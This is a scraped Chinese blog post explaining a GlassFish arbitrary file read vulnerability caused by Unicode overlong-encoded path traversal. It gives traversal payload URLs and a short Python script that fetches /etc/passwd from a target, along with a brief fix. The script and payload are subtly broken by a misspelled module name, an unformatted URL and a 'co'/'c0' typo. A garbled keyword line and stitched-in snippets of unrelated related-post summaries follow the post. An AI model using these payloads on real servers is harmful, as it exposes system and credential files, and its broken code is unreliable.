2. 程式人生 > >glassfish任意文件讀取漏洞解析

glassfish任意文件讀取漏洞解析

阿新 發佈:2018-01-10
glass pat them res unicode編碼 load ble ets 過濾

一、背景:

glassfish是一款java編寫的跨平臺的開源的應用服務器。

二、漏洞原理:

與寬字節SQL註入一致,都是由於unicode編碼歧義導致的。具體payload如下構造:

http://ip:port/theme/META-INF/%c0%ae%co%ae/%c0%ae%co%ae/xxxpath/xxxfile

上述利用可以變形:

http://ip:port/theme/META-INF/%c0.%co./%c0.%co./%c0.%co./%c0.%co./%c0.%co./xxxpath/xxxfile

三、修復方案:

過濾掉. /等關鍵輸入即可。

四、檢查部分關鍵代碼:

1 #glassfish any files readable vuln:
 

2 import requests
3 def check(ip,port):
4     url = "http://%s:%s/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
5     response = requsets.get(url)
6     if response.status_code == 200:
7         print "Vuln"

glassfish任意文件讀取漏洞解析

相關推薦

glassfish任意讀取漏洞解析

glass pat them res unicode編碼 load ble ets 過濾 一、背景: glassfish是一款java編寫的跨平臺的開源的應用服務器。 二、漏洞原理: 與寬字節SQL註入一致,都是由於unicode編碼歧義導致的。具體payload如下構造:

PHPMailer命令執行及任意讀取漏洞

custom orm cga -s tails 文件 ack exp else   今天在thinkphp官網閑逛,無意下載了一套eduaskcms,查看了一下libs目錄中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜這套CMS只

【代碼審計】兩個任意讀取漏洞實例

狀態 內容 cfg 必須 名稱 ror div 完整 FN 0x00 前言 0x01 漏洞實例一 環境搭建: XYHCMS官網:http://www.xyhcms.com/ 網站源碼版本:XYHCMS V3.5(2017-12-04 更新) 程序源碼下載:https:

monxin cms 任意刪除漏洞

str date 發現 漏洞 conf cti 問題 var_dump ray \program\diypage\receive\edit.php首先看到一個unlink($path);本來應該先看sql語句的,但知道是任意文件刪除先跳過刪除語句,看看$path怎麽傳入的倒

Discuz!X 3.4 任意刪除漏洞復現過程(附python腳本)

文件刪除 def aaa dal -1 headers bug send auth   今天看下群裏在討論Discuz!X 3.4 任意文件刪除漏洞,自己做了一些測試,記錄一下過程。結尾附上自己編寫的python腳本,自動化實現任意文件刪除。 具體漏洞,請查看 https:

任意讀取

config tracking ont sed views ack passwd enc pro 轉自http://blog.csdn.net/cd_xuyue/article/details/50560259 敏感字段 &RealPath= &

【代碼審計】CLTPHP_v5.5.3後臺任意下載漏洞分析

func attach database 9.png jpg 允許 left 簡單 服務 0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站源碼版本:CLTPHP內容管理系統5.5.3版本 程序源碼下載:https://git

【代碼審計】CLTPHP_v5.5.3後臺任意刪除漏洞分析

login alt flag div 網站源碼 用戶 urn 測試 result 0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站源碼版本:CLTPHP內容管理系統5.5.3版本 程序源碼下載:https://gitee.c

feifeicms後臺任意讀取

spa class oca action 基本上 直接 aac png icm 前臺大略看了下,本身內容比較簡單,經過“洗禮”後以及沒什麽問題了,基本上輸入都過濾了。 這次審計找到了一個後臺的任意文件讀取,可以讀取數據庫配置文件。 在DataAction.clas

【U1結業機試題】新聞內容管理系統:解析XML讀取Html模版生成網頁

repl att not 一個 class 新的 create hashmap exception 一、作業要求: 1.在xml文件中創建新聞節點news,包含標題、作者、日期、正文等信息 2.創建HTML模板文件 3.讀取xml中所有新聞信息,並使用新聞信息替換模板文件中

1.3 任意查看與下載漏洞

mil earch 任意文件讀取 標識符 用戶 內容 函數 b- sts 任意文件查看與下載漏洞 漏洞介紹 一些網站由於業務需求,往往需要提供文件查看或文件下載功能,但若對用戶查看或下載的文件 不做限制,則惡意用戶就能夠查看或下載任意敏感文件,這就是文件查看與下載漏洞

WebLogic任意上傳漏洞復現與分析 -【CVE-2018-2894 】

安全 tar lan ide web htm 過濾 eval base CVE-2018-2894 漏洞影響版本:10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3 下載地址:http://download.oracle.com/otn/nt/mi

WebLogic 任意上傳 遠程代碼執行漏洞 (CVE-2018-2894)------->>>任意上傳檢測POC

htm input ade print out vcg exc ops 上傳 前言: Oracle官方發布了7月份的關鍵補丁更新CPU(Critical Patch Update),其中針對可造成遠程代碼執行的高危漏洞 CVE-2018-2894 進行修復: http:

讀取草稿(excel,csv)

string guid dwr lda clas isn urn datarow arraylist using NPOI.XSSF.UserModel; using System; using System.Collections.Generic; using Syst

java讀取與寫入

文件 public color exc cnblogs 循環 pack delet 根據 package com.myjava; import java.io.*; import java.util.ArrayList; import java.util.Collect

海康視頻錄像打包格式解析

播放器 set 文件的 錄像 alt -- 文件 header fixed 海康威視視頻錄像以PS格式打包,錄像設置時如將音頻設置為G.711 Alaw或者Ulaw,錄制下來的文件使用vlc/ffplay等標準播放器播放不出音頻,需要向海康申請專用的轉換庫來轉換,當然,打包

【代碼審計】VAuditDemo 包含漏洞

http code 頭像 col 函數 文件名 中一 判斷 包含漏洞 在 index.php中先判斷get過來的module是否設置了變量,如果已經設置,則包含module,並與字符串.inc拼接 inc格式一般是圖標或者頭像格式,因此我們可以初步判斷,這個包含應該是基於

java實現xml讀取並保存到對象

數據封裝 itl imp get return 配置文件 targe dom4j xml配置 首先淺聊一下解析xml的四種方式: 1.DOM方式:有缺點但是這個缺點卻也是他的優點。下面詳細介紹:

nj10---讀取

-- 沒有 數據 mode 案例 ejs func 所有 地址 介紹:fs模塊是文件操作的封裝,它提供了文件的讀取,寫入,更名,刪除,遍歷目錄,鏈接POSIX文件系統操作。與其他模塊不同的是,fs模塊中所有的操作都提供了異步和同步兩個版本,例如讀取文件內容函數異步方法:r

JVM中class探索與解析(一)

範圍 protected test except itl 指向 strac 相關 父類索引 一直想成為一名優秀的架構師的我,轉眼已經工作快兩年了,對於java內核了解甚少,閑來時間,看看JVM,吧自己的一些研究寫下來供大家參考,有不對的地方請指正。 廢話不多說,一起來看看J